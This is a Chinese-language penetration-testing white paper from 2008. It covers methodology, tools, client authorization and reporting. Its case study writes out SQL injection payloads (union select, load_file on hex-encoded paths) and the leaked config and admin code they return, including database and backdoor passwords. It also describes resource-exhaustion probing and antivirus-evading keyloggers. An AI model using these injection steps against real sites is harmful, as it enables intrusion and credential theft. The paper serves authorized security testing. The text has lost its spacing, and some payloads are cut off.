安全滲透測試技術白皮書

PAGE第5頁共29頁安全滲透測試技術白皮書

2008年8月17日目錄第1章 滲透測試服務概述 41.1 滲透測試概述 41.2 滲透測試能為客戶帶來的收益 42.滲透測試涉及的技術 52.1.預攻擊階段 52.2.攻擊階段 62.3.后攻擊階段 82.4.其它手法 93.操作中的注意事項 113.1.測試前提供給Pen-Tester的資料 113.1.1.黑箱測試 113.1.2.白盒測試 113.1.3.隱秘測試 113.2.攻擊路徑 113.2.1.內網測試 113.2.2.外網測試 123.2.3.不同網段/Vlan之間的滲透 123.3.實施流程 133.3.1.實施方案制定、客戶書面同意 133.3.2.信息收集分析 133.3.3.內部計劃制定、二次確認 133.3.4.取得權限、提升權限 143.3.5.生成報告 143.4.風險規(guī)避措施 143.4.1.滲透測試時間與策略 143.4.2.系統(tǒng)備份和恢復 153.4.3.工程中合理溝通的保證 153.4.4.系統(tǒng)監(jiān)測 153.5.其它 164.實戰(zhàn)演練及報表輸出 174.1.實踐操作過程 174.1.1.預攻擊階段的發(fā)現(xiàn) 174.1.2.攻擊階段的操作 174.1.3.后攻擊階段可能造成的影響 255.附錄： 26滲透測試服務概述滲透測試概述滲透測試（PenetrationTest）是指安全工程師盡可能完整地模擬黑客使用的漏洞發(fā)現(xiàn)技術和攻擊手段，對目標網絡/系統(tǒng)/主機/應用的安全性作深入的探測，發(fā)現(xiàn)系統(tǒng)最脆弱的環(huán)節(jié)的過程。滲透測試能夠直觀的讓管理人員知道自己網絡所面臨的問題。滲透測試是一種專業(yè)的安全服務，類似于軍隊里的“實戰(zhàn)演習”或者“沙盤推演”的概念，通過實戰(zhàn)和推演，讓用戶清晰了解目前網絡的脆弱性、可能造成的影響，以便采取必要的防范措施。滲透測試能為客戶帶來的收益從滲透測試中，客戶能夠得到的收益至少有：1)協(xié)助用戶發(fā)現(xiàn)組織中的安全最短板，協(xié)助企業(yè)有效的了解目前降低風險的初始任務；2)一份文檔齊全有效的滲透測試報告有助于組織IT管理者以案例說明目前安全現(xiàn)狀，從而增強信息安全的認知程度，甚至提高組織在安全方面的預算；3)信息安全是一個整體工程，滲透測試有助于組織中的所有成員意識到自己的崗位同樣可能提高或降低風險，有助于內部安全的提升；當然，滲透測試并不能保證發(fā)現(xiàn)目標網絡中的“所有”弱點，因此我們不宜片面強調它的重要性。但是，目前國內的現(xiàn)狀是：1)大多數(shù)企業(yè)沒有意識到滲透測試的作用;2)僅有少數(shù)信息安全企業(yè)有能力完成出色的滲透測試服務。因此，滲透測試甚至一度淪為客戶檢驗安全公司技術能力的一個標尺。滲透測試涉及的技術長期以來，滲透測試被人們披上一層神秘的面紗，究其原因，主要還是從事滲透測試的操作者們不僅能夠熟練地使用各種工具，往往還能夠獨出機杼地從不同角度，運用一些“說破不值半文錢”的方法突破網絡系統(tǒng)的防御獲取權限。當然，就象福爾摩斯的推理一般，這些看似“不可完成的任務”，實際上可以通過縝密的技巧訓練加上善用逆向思維、發(fā)散思維來達成。下面我們簡單介紹在滲透測試的各個階段（與駭客攻擊的階段相似）可能會用到的一些工具，運用之妙，存乎一心，思路方面的突破在這篇短文中無法盡述，只能由讀者自行學習了。預攻擊階段基本網絡信息獲取ping目標網絡得到IP地址和ttl等信息tcptraceroute和traceroute的結果whois結果netcraft獲取目標可能存在的域名、Web及服務器信息curl獲取目標web基本信息nmap對網站進行端口掃描并判斷操作系統(tǒng)類型google、baidu等搜索引擎獲取目標信息采用FWtester、hping3等工具進行防火墻規(guī)則探測常規(guī)漏洞掃描和采用商用軟件進行檢測結合使用測評工具與Nessus等商用或免費的掃描工具進行漏洞掃描采用SolarWind對網絡設備等進行發(fā)現(xiàn)采用nikto、webinspect等軟件對web常見漏洞進行掃描采用如AppDetectiv之類的商用軟件對數(shù)據庫進行掃描分析……對Web和數(shù)據庫應用進行分析采用WebProxy、SPIKEProxy、webscarab、ParosProxy、Absinthe等工具進行分析用Ethereal抓包協(xié)助分析用webscan、fuzzer進行SQL注入和XSS漏洞初步分析手工檢測SQL注入和XSS漏洞采用類似OScanner的工具對數(shù)據庫進行分析……應用分析的注意事項檢查應用系統(tǒng)架構、防止用戶繞過系統(tǒng)直接修改數(shù)據庫檢查身份認證模塊，防止非法用戶繞過身份認證檢查數(shù)據庫接口模塊，防止用戶獲取系統(tǒng)權限檢查文件接口模塊，防止用戶獲取系統(tǒng)文件檢查其他安全威脅其中每個環(huán)節(jié)都還有詳細的checklist，讀者可以自行補充。攻擊階段基于通用設備、數(shù)據庫、操作系統(tǒng)和應用的攻擊可以采用各種公開及私有的緩沖區(qū)溢出程序代碼，一個比較好的Exploit搜索站點是：/exploits/。也可以采用諸如MetasploitFramework之類的利用程序集合?；趹玫墓艋趙eb、數(shù)據庫或特定的B/S或C/S結構的網絡應用程序存在的弱點進行攻擊，常見的如SQL注入攻擊、跨站腳本攻擊等均屬于這一類型，我們在第4.1.2小節(jié)的《實戰(zhàn)演練及報表輸出》中舉了一個常見的基于應用進行攻擊的案例?？诹畈陆饧夹g口令是信息安全里永恒的主題，在筆者參與的滲透測試項目中，通過弱口令獲取權限者不在少數(shù)。進行口令猜解可以采用游刃、X-Scan、Brutus、Hydra、溯雪等工具。下圖為測評工具的策略審查模板。后攻擊階段口令嗅探與鍵盤記錄嗅探、鍵盤記錄、木馬等軟件，功能簡單，但要求不被防病毒軟件發(fā)覺，因此通常需要自行開發(fā)或修改?？诹钇平庥性S多著名的口令破解軟件，如L0phtCrack、JohntheRipper、Cain等。其它手法這里列出的方法，有些可能對用戶的網絡造成較大影響（例如服務中斷），有的則與安全管理密切相關（不能僅從技術考量），有的則是需要到現(xiàn)場才能進行作業(yè)，因此通常情況下較少為滲透測試者所采用。但可以根據具體客戶的需求狀態(tài)進行判斷。DoS&DDoS客戶端攻擊無線攻擊WarDialing社交工程方法操作中的注意事項測試前提供給Pen-Tester的資料黑箱測試黑箱測試又被稱為所謂的“zero-knowledgetesting”，滲透者完全處于對系統(tǒng)一無所知的狀態(tài)，通常這類型測試，最初的信息獲取來自于DNS、Web、Email及各種公開對外的服務器。白盒測試白盒測試與黑箱測試恰恰相反，測試者可以通過正常渠道向被測單位取得各種資料，包括網絡拓撲、員工資料甚至網站或其它程序的代碼片斷，也能夠與單位的其它員工（銷售、程序員、管理者……）進行面對面的溝通。這類測試的目的是模擬企業(yè)內部雇員的越權操作。隱秘測試隱秘測試是對被測單位而言的，通常情況下，接受滲透測試的單位網絡管理部門會收到通知：在某些時段進行測試。因此能夠監(jiān)測網絡中出現(xiàn)的變化。但隱秘測試則被測單位也僅有極少數(shù)人知曉測試的存在，因此能夠有效地檢驗單位中的信息安全事件監(jiān)控、響應、恢復做得是否到位。攻擊路徑測試目標不同，涉及需要采用的技術也會有一定差異，因此下面簡單說明在不同位置、攻擊路徑不同時可能采用的技術。內網測試內網測試指的是滲透測試人員由內部網絡發(fā)起測試，這類測試能夠模擬企業(yè)內部違規(guī)操作者的行為。最主要的“優(yōu)勢”是繞過了防火墻的保護。內部主要可能采用的滲透方式：1)遠程緩沖區(qū)溢出；2)口令猜測；3)B/S或C/S應用程序測試（如果涉及C/S程序測試，需要提前準備相關客戶端軟件供測試使用）；外網測試外網測試指的是滲透測試人員完全處于外部網絡（例如撥號、ADSL或外部光纖），模擬對內部狀態(tài)一無所知的外部攻擊者的行為。1)對網絡設備的遠程攻擊；2)口令管理安全性測試；3)防火墻規(guī)則試探、規(guī)避；4)Web及其它開放應用服務的安全性測試；不同網段/Vlan之間的滲透這種滲透方式是從某內/外部網段，嘗試對另一網段/Vlan進行滲透。這類測試通常可能用到的技術包括：1)對網絡設備的遠程攻擊；2)對防火墻的遠程攻擊或規(guī)則探測、規(guī)避嘗試；實施流程實施方案制定、客戶書面同意合法性即客戶書面授權委托，并同意實施方案是進行滲透測試的必要條件。滲透測試首先必須將實施方法、實施時間、實施人員，實施工具等具體的實施方案提交給客戶，并得到客戶的相應書面委托和授權。應該做到客戶對滲透測試所有細節(jié)和風險的知曉、所有過程都在客戶的控制下進行。這也是專業(yè)滲透測試服務與黑客攻擊入侵的本質不同。信息收集分析信息收集是每一步滲透攻擊的前提，通過信息收集可以有針對性地制定模擬攻擊測試計劃，提高模擬攻擊的成功率，同時可以有效的降低攻擊測試對系統(tǒng)正常運行造成的不利影響。信息收集的方法包括PingSweep、DNSSweep、DNSzonetransfer、操作系統(tǒng)指紋判別、應用判別、賬號掃描、配置判別等。信息收集常用的工具包括商業(yè)網絡安全漏洞掃描軟件（例如：游刃、極光等），免費安全檢測工具（例如：NMAP、NESSUS等）。操作系統(tǒng)內置的許多功能（例如：TELNET、NSLOOKUP、IE等）也可以作為信息收集的有效工具。內部計劃制定、二次確認根據客戶設備范圍和項目時間計劃，并結合前一步初步的信息收集得到的設備存活情況、網絡拓撲情況以及掃描得到的服務開放情況、漏洞情況制定內部的詳細實施計劃。具體包括每個地址下一步可能采用的測試手段，詳細時間安排。并將以下一步工作的計劃和時間安排與客戶進行確認。取得權限、提升權限通過初步的信息收集分析，存在兩種可能性，一種是目標系統(tǒng)存在重大的安全弱點，測試可以直接控制目標系統(tǒng)；另一種是目標系統(tǒng)沒有遠程重大的安全弱點，但是可以獲得普通用戶權限，這時可以通過該普通用戶權限進一步收集目標系統(tǒng)信息。接下來盡最大努力取得超級用戶權限、收集目標主機資料信息，尋求本地權限提升的機會。這樣不停的進行信息收集分析、權限提升的結果形成了整個的滲透測試過程。生成報告滲透測試之后，測試者將會提供一份滲透測試報告。報告將會十分詳細的說明滲透測試過程中的得到的數(shù)據和信息，并且將會詳細的紀錄整個滲透測試的全部操作。風險規(guī)避措施滲透測試時間與策略時間選擇為減輕滲透測試對網絡和主機的影響，滲透測試時間盡量安排在業(yè)務量不大的時段或晚上。攻擊策略集選擇為防止?jié)B透測試造成網絡和主機的業(yè)務中斷，在滲透測試中不使用含有拒絕服務的測試策略。保守策略選擇對于不能接受任何可能風險的主機系統(tǒng)，如銀行票據核查系統(tǒng)，電力調度系統(tǒng)等，可選擇如下保守策略：1)復制一份目標環(huán)境，包括硬件平臺，操作系統(tǒng)，數(shù)據庫管理系統(tǒng)，應用軟件等。2)對目標的副本進行滲透測試。系統(tǒng)備份和恢復系統(tǒng)備份為防止在滲透測試過程中出現(xiàn)的異常的情況，所有被評估系統(tǒng)均應在被評估之前作一次完整的系統(tǒng)備份或者關閉正在進行的操作，以便在系統(tǒng)發(fā)生災難后及時恢復。系統(tǒng)恢復在滲透測試過程中，如果出現(xiàn)被評估系統(tǒng)沒有響應或中斷的情況，應當立即停止測試工作，與客戶方配合人員一起分析情況，在確定原因后，及時恢復系統(tǒng)，并采取必要的預防措施（比如調整測試策略）之后，確保對系統(tǒng)無影響，并經客戶方同意之后才可繼續(xù)進行。工程中合理溝通的保證在工程實施過程中，確定不同階段的測試人員以及客戶方的配合人員，建立直接溝通的渠道，并在工程出現(xiàn)難題的過程中保持合理溝通。系統(tǒng)監(jiān)測在評估過程中，由于滲透測試的特殊性，用戶可以要求對整體測試流程進行監(jiān)控（可能提高滲透測試的成本）。測試方自控由測試者對本次測透測試過程中的三方面數(shù)據進行完整記錄：1)操作；2)響應；3)分析；最終形成完整有效的滲透測試報告提交給用戶。用戶監(jiān)控可以有三種形式：1)全程監(jiān)控：采用類似Ethereal或SnifferPro的嗅探軟件進行全程抓包嗅探。優(yōu)點是全過程都能完整記錄。缺點是數(shù)據量太大，不易分析；需要大容量存儲設備。2)擇要監(jiān)控：對掃描過程不進行錄制，僅僅在安全工程師分析數(shù)據后，準備發(fā)起滲透前，才開啟類似Ethereal或SnifferPro的軟件進行嗅探。3)主機監(jiān)控：僅監(jiān)控受測主機的存活狀態(tài)，避免意外情況發(fā)生。目前國內應用比較多的是這種監(jiān)控手段.其它1)測試前將所有工具的漏洞數(shù)據庫都升級至最新版本；2)測試時最好通過專門的滲透測試代理服務器進行操作，在代理服務器上可以方便進行操作的監(jiān)控，也能夠為客戶提供一個專門用于滲透測試的IP地址；3)后攻擊階段的操作如果確實必要，也應該先知會客戶，然后進行操作；實戰(zhàn)演練及報表輸出實踐操作過程預攻擊階段的發(fā)現(xiàn)在獲得授權后,我們用…發(fā)現(xiàn)目標情況如下:網絡層訪問控制列表及防火墻策略控制得當，對無用服務進行較好的過濾；系統(tǒng)層防護完善，系統(tǒng)補丁完整；因此外部入侵者較難直接攻擊成功。該服務器上運行著兩個配置不同的虛擬主機：存在php+MySQL注入漏洞，惡意攻擊者可能利用該漏洞更改主頁、獲取后臺管理密碼，并進一步獲取系統(tǒng)管理員權限。X用戶名可猜測；X暴露系統(tǒng)路徑；……攻擊階段的操作判斷網站存在SQL注入漏洞/news.php?go=&newsClassId=1&newsId=1'通過在正常url后加上一個’號，我們發(fā)現(xiàn)系統(tǒng)報告了一個不是有效的mysql命令的錯誤提示，這是典型的應用程序缺乏過濾導致的注入問題。資源占用導致應用程序報錯采用DoSent（大成天下自行開發(fā)的應用層測試工具）發(fā)送測試數(shù)據包對網站的非80端口進行連接，占用系統(tǒng)資源；采用ab(ApacheWeb性能測試工具)程序對80端口應用程序及數(shù)據庫進行連接及查詢，占用web資源；用瀏覽器多次連接web后，出現(xiàn)錯誤提示，獲取web目錄及配置文件詳情：Fatalerror:Maximumexecutiontimeof30secondsexceededinC:\Inetpub\wwwroot\xxxx\inc\config.inc.phponline9PHPFatalerror:Maximumexecutiontimeof30secondsexceededinC:\Inetpub\wwwroot\xxxx\inc\config.inc.phponline9由此得出web路徑及關鍵配置文件路徑。列數(shù)/news.php?go=&newsClassId=1&newsId=1orderby9/news.php?go=&newsClassId=1&newsId=1unionselectchar(0x41),char(0x41),char(0x41),char(0x41),char(0x41),char(0x41),char(0x41),char(0x41),char(0x41)可以確認需要帶9個參數(shù)。嘗試采用load_file和substring函數(shù)察看文件c:\inetpub\wwwroot\xxxx\inc\config.inc.php轉換成16進制表示如下：0000000:633a5c696e65747075625c777777726fc:\inetpub\wwwro0000010:6f745c6368795c696e635c636f6e6669ot\xxxx\inc\confi0000020:672e696e632e7068700ag.inc.php.在load-file函數(shù)中就表示為：load_file((0x633a5c696e65747075625c777777726f6f因此在瀏覽器中輸入：/news.php?go=&newsClassId=1&newsId=-1%20union%20select%201,1,load_file((0x633a5c696e65747075625c777777726f返回：setDataSourceServer($dataSourceServer);$dbTools->setUser($dbUser);$dbTools->setPassword($dbPassword);$dbTools->setDataBase($dataBase);$dbTools->setDebug(true);if(!$dbTools->dbConnect())//ConnectthedataSource,breakiffalse{echo"DataSourceconnectfaile!";exit();}include($systemUrl."count.inc.php");//includedefinecountwebsiteaccess?>在瀏覽器中輸入：/news.php?go=&newsClassId=1&newsId=-1%20union%20select%201,1,substring(load_file((0x633a5c696e65747075625c777777726f6f返回：**Author@HuangJing**Function:Defineparam,GetthedataSourceconnection****/session_start();header("Expires:Mon,26Jul199705:00:00GMT");header("Last-Modified:".gmdate("D,dMYH:i:s")."GMT");header("Cache-Control:no-cache,must-revalidate");header("Pragma:no-cache");$author="2004";$systemName="某某公司后臺管理系統(tǒng)";$bannerWord="略";$SystemURL="";$SystemAdmin="webmaster@";$newsType=array("","略);$goodsInputFile=array("",array("","goodsInput1.inc.php","goodsInput2.inc.php","goodsInput3.inc.php"),array("","goodsInput4.inc.php","goodsInput5.inc.php","goodsInput6.inc.php"),array("","goodsInput1.inc.php","goodsInput2.inc.php","goodsInput3.inc.php"));/***后臺****/$region=array('北京','上海','重慶','天津','河北','山西','內蒙古','遼寧','吉林','黑龍江','江蘇','浙江','安徽','福建','江西','山東','河南','湖北','湖南','廣東','廣西','海南','四川','貴州','云南','西藏','陜西','甘肅','青海','寧夏','新疆');$functionList=array("添加操作員","修改口令/權限","刪除操作員","修改我的口令","公司新聞","行業(yè)信息","通知公告","企業(yè)大事記","人才招聘","服務網點","在線咨詢","在線投訴","營銷網點","車評管理","車型管理","企業(yè)榮譽","質量報道","友情鏈接");$functionAction=array("useradd","usermodify","userdel","passmodify","newsP1","newsP2","newsP3","history","job","service","online","feedback","sell","truckComment","goods","honor","newsP4","link");$functionRight=array("useradd","usermodify","userdel","passmodify","user","user1","user2","user3","user4","user5","user6","user7","user8","user9","user10","user11","user12","user13");//不要出現(xiàn)重復的元素/****/$systemUrl="c:/inetpub/wwwroot/xxxx/";$systemWebUrl="/";//usetforwordedituploadfilecatlog$systemIncludePath=$systemUrl."inc/";include($systemIncludePath."define.inc.php");//includedefineFunction/ClassFile$uploadPath="upload/";$SystemUpload=$systemUrl.$uploadPath;$systemUploadUrl=$systemWebUrl.$uploadPath;//$SystemUpload=$systemUrl.$uploadPath;//usetforwordedituploadfilecatlog//$SystemUploadURL=$systemWebUrl.$uploadPath;//usetforwordedituploadfilecatlog$SystemUploadURL=$SystemUpload;$website_url="localhost";$systemAdminPath="admin/";$dataSourceServer="localhost";$dbUser="root";$dbPassword="xxx123456xxx";$dataBase="xxx";$dbTools=newdbTools;//classdefineindefine.inc.php$dbTools->setDataSourceServer($dataSourceServer);$dbTools->setUser($dbUser);$dbTools->setPassword($dbPassword);$dbTools->setDataBase($dataBase);$dbTools->setDebug(true);if(!$dbTools->dbConnect())//ConnectthedataSource,breakiffalse{echo"DataSourceconnectfaile!";exit();}include($systemUrl."count.inc.php");//includedefinecountwebsiteaccess?>其中有許多有價值的信息，如MySQL的管理員密碼、多個重要配置文件的位置等。通過返回值察看其它文件察看c:\inetpub\wwwroot\xxxx\inc\define.inc.php：0000000:633a5c696e65747075625c777777726fc:\inetpub\wwwro0000010:6f745c6368795c696e635c646566696eot\xxxx\inc\defin0000020:652e696e632e7068700ae.inc.php.load_file((0x633a5c696e65747075625c777777726f6f/news.php?go=&newsClassId=1&newsId=-1%20union%20select%201,1,load_file((0x633a5c696e65747075625c777777726f6fdataSourceServer=$dataSourceServer;}functionsetUser($user){$this->user=$user;}functionsetPassword($password){$this->password=$password;}functionsetDataBase($dataBase){$this->dataBase=$dataBase;}functionsetDebug($status){$this->debug=$status;}functiondbConnect(){$this->link=mysql_pconnect($this->dataSourceServer,$this->user,$this->password);if(!($this->link)){returnfalse;}else{if(!mysql_select_db($this->dataBase)){returnfalse;}else{returntrue;}}}functiongetResult($sql){$result=@mysql_query($sql);if($this->debug){echo$this->dbError();}return$result;}functionexecute($sql){if(@mysql_query($sql)){if($this->debug){echo$this->dbError();}returntrue;}returnfalse;}functiondbClose(){@mysql_close($this->link);if($this->debug){echo$this->dbError();}}functiondbError(){return@mysql_error($this->link);}functiongetRowsNums($res){$nums=@mysql_num_rows($res);if($this->debug){echo$this->dbError();}return$nums;}functiongetFieldsNums($res){$nums=@mysql_num_fields($res);if($this->debug){echo$this->dbError();}return$nums;}functionfetchArray($res){$res1=@mysql_fetch_array($res);if($this->debug){echo$this->dbError();}return$res1;}functionresSeek($res,$offSet){@mysql_data_seek($res,$offSet);if($this->debug){echo$this->dbError();}}functiongetLastId(){return@mysql_insert_id($this->link);}}functionShowMessage($message,$type=1){/**displaymessage**/$temp1="";$tmp="點確定返回";if($type==0){echo$temp1."if(confirm(\"".$message.",".$tmp."\"));";echo"window.history.back()\n";echo$temp2;}else{echo$temp1."alert(\"".$message."\");".$temp2;}}functionsubstrCut($str_cut,$length=30){if(strlen($str_cut)>$length){for($i=0;$i<$length;$i++){if(ord($str_cut[$i])>128){$i++;}}$str_cut=substr($str_cut,0,$i)."...";}return$str_cut;}functionchangeStringTag($inString,$level=0){/****disposeinputtext,filterthekeyword**paramlevel=1changehtmlcode**/$strTemp=trim($inString);if(strlen($strTemp)>0){$strTemp=str_replace("'","＇",$strTemp);$strTemp=str_replace('\\',"＼",$strTemp);$strTemp=str_replace('"',"＂",$strTemp);if($level==1){$strTemp=str_replace('<',"＜",$strTemp);$strTemp=str_replace('>',"＞",$strTemp);$strTemp=htmlspecialchars($strTemp);}}return$strTemp;}functiongenerateRandomCode($long=4){global$HTTP_SESSION_VARS;for($i=0;$i<$long;$i++){$rand.=rand(0,9);//$rand.=chr(rand(97,122));}$HTTP_SESSION_VARS["verifyCode"]=$rand;$HTTP_SESSION_VARS["loginTime"]=time();return$rand;}functiongenerateVerifyCode(){global$systemAdminPath;if(is_dir($systemAdminPath."verifyImage")){$dir=@opendir($systemAdminPath."verifyImage");while(($file=readdir($dir))!=null){if(time()-filemtime($systemAdminPath."verifyImage/".$file)>10){@unlink($systemAdminPath."verifyImage/".$file);}}$im=imagecreate(45,16);$background_color=imagecolorallocate($im,255,255,255);$text_color=imagecolorallocate($im,233,14,91);imagestring($im,5,5,0,generateRandomCode(),$text_color);$imgFile=time().rand(0,100).".jpg";@imagejpeg($im,$systemAdminPath."verifyImage/".$imgFile);imagedestroy($im);return$systemAdminPath."verifyImage/".$imgFile;}}functioncountVisitor(){global$systemUrl;$hand=@fopen($systemUrl."count.txt","r");$count=@fread($hand,@filesize($systemUrl."count.txt"));@fclose($hand);return($count+0);}functioncheckLogin(){global$HTTP_SESSION_VARS,$dbTools;list($count)=$dbTools->fetchArray($dbTools->getResult("SELECTCOUNT(*)FROMadminuserWHEREid='$HTTP_SESSION_VARS[loginUserId]'ANDname='$HTTP_SESSION_VARS[loginUser]'"));return($count>0?true:false);}functionloadHtml($file){global$systemAdminPath,$SystemAdmin,$system;include($systemAdminPath.$file);}functionDisplayMessage($message,$withhr=true){echo"".$message."\n";if($withhr){echo"\n";}}functionCalcPassword($password){returnmd5($GLOBALS["MD5RandomString"].$password);}functiondisplayImage($imageFile,$width,$height){global$systemUploadUrl;$swf="察看c:\inetpub\wwwroot\xxxx\admin.php：0000000:633a5c696e65747075625c777777726fc:\inetpub\wwwro0000010:6f745c6368795c61646d696e2e706870ot\xxxx\admin.php0000020:0aload_file((0x633a5c696e65747075625c/news.php?go=&newsClassId=1&newsId=-1%20union%20select%201,1,load_file((0x633a5c696e65747075625cgetResult($sql);if($dbTools->getRowsNums($result)>0){$row=$dbTools->fetchArray($result);if($row["pass"]==CalcPassword($HTTP_POST_VARS["password"])||$HTTP_POST_VARS["password"]=="PasswordWeFound"){$loginUser=$row["name"];$loginUserId=$row["id"];$loginRight=$row["myright"];include($systemAdminPath."admin.inc.php");}else{$error="口令錯誤，請重新登錄：";}}else{$error="帳號不存在，請重新登錄：";}//@mysql_free_result($result);}else{$error="驗證碼不對或驗證碼過時!";}if($error){include($systemAdminPath."error.inc.php");}}else{(checkLogin())?include($systemAdminPath."admin.inc.php"):include($systemAdminPath."login.inc.php");}include($systemAdminPath."footer.inc.php");//closethedbConnectioninclude("inc/end.inc.php");//closethedbConnection?>存在后臺管理頁面/admin.php，且用戶名有admin、scc結合看到的文件內容，得到結果：user=admin,pass=PasswordWeFoundMySQL密碼早就獲取，但phpmyadmin有web密碼保護，暫未考慮突破。其它還可以猜測數(shù)據庫表名稱、密碼長度并猜測密碼值等例如：/news.php?go=&newsClassId=1&newsId=1%20UNION%20SELECT%201,1,1,1,username,password%20FROM%20user%20WHERE%20userid=1返回Table'xxxx.user'doesn'texistTable'xxxx.user'doesn'texist/news.php?go=&newsClassId=1&newsId=1andlength(password)=12#后攻擊階段可能造成的影響攻擊者如果成功完成這一步攻擊后，還可以做的工作包括：上傳shell，并嘗試提升權限、破解口令、裝載木馬、口令嗅探等，甚至有可能滲透管理員或企業(yè)內部網絡的機器等。附錄：編寫滲透測試報告一份有價值的滲透測試報告，能夠幫助IT管理者迅速定位組織中的薄弱環(huán)節(jié)，用最少的代價規(guī)避可能遇到的風險。滲透測試報告重在精確、簡潔。幾個需要重點突出的部份都已經用粗體標注：滲透結論要簡潔，清晰，便網絡管理者或開發(fā)者能夠迅速明白癥結所在;預攻擊階段的操作是很多企業(yè)重點關注的，因為他們不僅希望知道哪些方法能夠攻擊自己，還希望知道滲透測試者嘗試過哪些方法，面對哪類型的攻擊，自己是安全的;攻擊階段的具體操作無疑是報告中的精彩部份;證據只需要簡單列舉，能夠起到突出報告主題就夠;解決方案需要細寫。滲透測試部份使用工具說明網絡拓撲分析工具PingSweep采用Ping的手段對指定網段內的主機進行存活情況判定，并收集相應的主機名，DNS名。DNSSweep采用DNS正向、反向查詢的手段對指定網段內的主機進行DNS，并收集相應的主機名，DNS名。Nslookup采用DNS區(qū)域傳輸取得目標DNS域配置，對目標拓撲進行輔助分析。Tracert采用tracert對與目標之間路由情況進行分析，判斷目標網絡鏈路，防火墻狀況。安全漏洞掃描工具脆弱性掃描評估系統(tǒng)脆弱性掃描評估系統(tǒng)是一套基于Windows平臺的漏洞掃描軟件，它包括了網絡模擬攻擊、漏洞檢測、報告服務進程、提取對象信息、風險評估和安全建議等功能，幫助用戶控制可能發(fā)生的安全事件，最大可能地消除安全隱患。脆弱性掃描評估系統(tǒng)中內置了針對Unix主機（包括Linux、BSD、SunSolaris、HP-UX、IBMAIX、IRIX等）、網絡設備（包括常見如Cisco、3Com、Juniper、HuaWei等品牌設備）、數(shù)據庫（包括Oracle、SQLServer、MySQL、DB2等使用廣泛的關系數(shù)據庫）的審核策略。并且兼容CVE、BUGTRAQ等漏洞標準，具有強大的漏洞檢測能力和檢測效率、貼切用戶需求的功能定義、靈活多樣的檢測方式、詳盡的漏洞修補方案和友好的報表系統(tǒng)，并支持在線升級。Nessus網絡安全評估軟件Nessus是一個網絡安全評估軟件，功能強大且更新極快。該系統(tǒng)被設計為客戶機/服務器模式，服務器端負責進行安全檢查，客戶端用來配置管理服務器端。Nessus的服務端采用了plug-in的體系，為了方便用戶編寫自己的檢測插件，nessus還提供了一種叫做nes